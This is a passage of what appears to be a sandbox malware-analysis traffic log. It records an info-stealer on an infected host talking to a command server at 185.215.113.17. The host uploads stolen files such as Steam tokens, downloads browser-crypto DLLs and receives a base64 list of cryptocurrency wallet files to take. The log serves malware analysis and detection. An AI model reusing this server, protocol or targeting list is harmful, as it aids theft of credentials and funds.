                                                                          Keep-Alive: timeout=5, max=92
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:21.706489086 CEST564OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 363
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                          Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file"------GCAKKECAEGDGCBFIJEGH--
                                                                          Sep 27, 2024 04:21:22.009330034 CEST202INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:21 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=91
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:23.970422983 CEST93OUTGET /f1ddeb6592c03206/freebl3.dll HTTP/1.1
                                                                          Host: 185.215.113.17
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:24.196475029 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:24 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          ETag: "a7550-5e7e950876500"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 685392
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                          Sep 27, 2024 04:21:25.403312922 CEST93OUTGET /f1ddeb6592c03206/mozglue.dll HTTP/1.1
                                                                          Host: 185.215.113.17
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:25.629426003 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:25 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          ETag: "94750-5e7e950876500"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 608080
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                          Sep 27, 2024 04:21:26.216484070 CEST94OUTGET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1
                                                                          Host: 185.215.113.17
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:26.442964077 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:26 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          ETag: "6dde8-5e7e950876500"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 450024
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                          Sep 27, 2024 04:21:26.837861061 CEST90OUTGET /f1ddeb6592c03206/nss3.dll HTTP/1.1
                                                                          Host: 185.215.113.17
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:27.063851118 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:26 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          ETag: "1f3950-5e7e950876500"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 2046288
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                          Sep 27, 2024 04:21:28.640436888 CEST94OUTGET /f1ddeb6592c03206/softokn3.dll HTTP/1.1
                                                                          Host: 185.215.113.17
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:28.866633892 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:28 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          ETag: "3ef50-5e7e950876500"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 257872
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                          Sep 27, 2024 04:21:29.369751930 CEST98OUTGET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1
                                                                          Host: 185.215.113.17
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:29.597242117 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:29 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          ETag: "13bf0-5e7e950876500"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 80880
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                          Sep 27, 2024 04:21:30.769413948 CEST202OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJE
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 1067
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:31.250708103 CEST202INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:30 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=84
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:31.597893953 CEST468OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 267
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 2d 2d 0d 0a
                                                                          Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="message"wallets------JKJDBAAAEHIEGCAKFHCG--
                                                                          Sep 27, 2024 04:21:31.988763094 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:31 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Vary: Accept-Encoding
                                                                          Content-Length: 2408
                                                                          Keep-Alive: timeout=5, max=83
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                          Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                          Sep 27, 2024 04:21:31.999931097 CEST466OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 265
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a
                                                                          Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="message"files------CGHDAKKJJJKJKECBGCGD--
                                                                          Sep 27, 2024 04:21:32.228271008 CEST202INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:32 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=82
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:32.254424095 CEST564OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 363
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                          Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file"------AKECBFBAEBKJJJJKFCGC--
                                                                          Sep 27, 2024 04:21:32.570163965 CEST202INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:32 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=81
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:32.598932981 CEST473OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBA
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 272
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
